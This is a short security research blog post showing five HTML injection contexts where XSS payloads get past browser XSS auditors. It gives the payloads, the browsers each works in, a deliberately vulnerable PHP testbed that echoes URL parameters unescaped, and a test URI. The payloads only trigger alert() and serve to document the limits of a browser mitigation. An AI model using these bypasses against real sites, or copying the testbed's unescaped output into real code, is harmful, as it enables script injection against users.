5 contexts where the XSS Auditor won't help you

While implementing a new JavaScript engine into Detectify, we discovered that the XSS auditors in modern browsers wasn’t as good at catching special cases as we thought. Considering that we had such a good response to our previous post on bypassing the Chrome XSS Auditor, we thought this would make a fitting post.

But nevermind the details, let’s get to it!

Context 1:

<script src="[Injection]"></script>

Injection: data:,alert(1)

<script src="data:,alert(1)"></script>

Works in: Chrome, Opera, Firefox, IE

Context 2:

<img src="notfound" onerror="[Injection]" />

Injection: alert(2)

<img src="notfound" onerror="alert(2)" />

Works in: Chrome, Opera, Firefox, IE

Context 3:

<script>var string = "[Injection]"</script>

Injection: “alert(3)”

<script>var string = ""*alert(3)*""</script>

Works in: Chrome, Opera, Firefox

Context 4:

<iframe src="[Injection]"></iframe>

Injection: javascript:alert(4)

<frame src="javascript:alert(4)"></iframe>

Works in: Chrome, Opera, Firefox

Context 5:

Some [Injection] text on the same line [Injection]

Injection: %0aalert(5)</script><script>–>

Some 
alert(5)</script><script>--> text on the same line 
alert(5)</script><script>-->

Works in: Chrome, Opera, Firefox 
Note that context 5 only work with the “–>” style comment, and won’t work with “/*” or “//” style comments.

Testbed

<html>
<script src="<?=@$_GET[1]?>"></script>
<script>var string = "<?=@$_GET[2]?>"</script>
<iframe src="<?=@$_GET[3]?>"></iframe>
<img src="x" onerror=<?=@$_GET[4]?> />
Some <?=@$_GET[5]?>text on the same line<?=@$_GET[5]?>
</html>

Test URI: ?1=data:,alert(1)&2=“alert(2)”&3=javascript:alert(3)&4=onerror=alert(4)&5=%0aalert(5)</script><script>–>

To the defense of the developers of the auditors/filters, these filters are only supposed to be a mitigation, and “as good as possible”. While it’s no secret that they don’t catch everything, we still thought we would share the specific contexts we had discovered.

Author: Mathias Karlsson